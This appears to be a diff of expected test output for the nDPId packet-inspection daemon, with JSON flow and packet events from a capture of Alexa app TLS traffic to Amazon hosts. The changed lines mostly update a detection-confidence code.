00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1490976047050,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047050,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8zEVAAEAGR+WsECrYNu8YuoTyAbvILJz0AAAAAKAC\/\/\/j9wAAAgQFtAQCCAoA9lCxAAAAAAEDAwg="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1490976047071,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047071,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwYANAAOcGDTM27xi6rBAq2AG7hPHQ2dGWKLR0gXASH\/53JwAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1490976047073,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047073,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJC5AAEAG8BCsECrYNu8YuoTxAbsotHSB0NnRl1AQAVfBmAAA"} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047014,"flow_last_seen":1490976047075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047075,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047014,"flow_last_seen":1490976047075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047075,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047096,"flow_last_seen":1490976047096,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047096,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1490976047096,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047096,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Q4ZAAEAGA2msECrYNF7ohrJzAbuRhBMzAAAAAKAC\/\/+poAAAAgQFtAQCCAoA9lC1AAAAAAEDAwg="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1490976047107,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047107,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwYitAAOcGCws27xi6rBAq2AG7hPIGkxHQyCyc9XASH\/45RwAAAgQFtAEDAwY="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1490976047109,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047109,"pkt":"AMDKkaPvePiC0\/vCCABFAAAozEZAAEAGR\/isECrYNu8YuoTyAbvILJz1BpMR0VAQAVeDuAAA"} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047050,"flow_last_seen":1490976047111,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047111,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047014,"flow_last_seen":1490976047133,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047133,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047050,"flow_last_seen":1490976047111,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047111,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047014,"flow_last_seen":1490976047133,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047133,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1490976047154,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047154,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwRp1AAOcGWV00XuiGrBAq2AG7snPq5wFokYQTNHASH\/4rBwAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1490976047155,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047155,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoQ4dAAEAGA3ysECrYNF7ohrJzAbuRhBM06ucBaVAQAVd1eAAA"} 
-00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047096,"flow_last_seen":1490976047156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047156,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":641,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047050,"flow_last_seen":1490976047169,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047169,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":645,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976047096,"flow_last_seen":1490976047217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047096,"flow_last_seen":1490976047156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047156,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":641,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047050,"flow_last_seen":1490976047169,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047169,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":645,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976047096,"flow_last_seen":1490976047217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047560,"flow_last_seen":1490976047560,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047560,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1490976047560,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047560,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8csJAAEAG6uOsECrYNFXR2NSbAbtgrSImAAAAAKAC\/\/+\/5AAAAgQFtAQCCAoA9lDkAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047563,"flow_last_seen":1490976047563,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047563,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1490976047563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047563,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8y+FAAEAGgVWsECrYSBXOh6SfAbuD+JsFAAAAAKAC\/\/9DRwAAAgQFtAQCCAoA9lDkAAAAAAEDAwg="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1490976047602,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047602,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71JuiSVznYK0iJ6AScSA47wAAAgQFtAQCCAptkKkCAPZQ5AEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1490976047603,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976047603,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0csNAAEAG6uqsECrYNFXR2NSbAbtgrSInoklc6IAQAVfXgQAAAQEICgD2UOhtkKkC"} 
-00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047560,"flow_last_seen":1490976047610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976047610,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047560,"flow_last_seen":1490976047610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976047610,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1490976047629,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047629,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwJsxAAOcGf3ZIFc6HrBAq2AG7pJ+6tUVgg\/ibBnASH\/6xFgAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1490976047631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047631,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoy+JAAEAGgWisECrYSBXOh6SfAbuD+JsGurVFYVAQAVf7hwAA"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047563,"flow_last_seen":1490976047631,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047631,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976047560,"flow_last_seen":1490976047664,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1490976047664,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":704,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047563,"flow_last_seen":1490976047695,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976047695,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047563,"flow_last_seen":1490976047631,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047631,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976047560,"flow_last_seen":1490976047664,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1490976047664,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
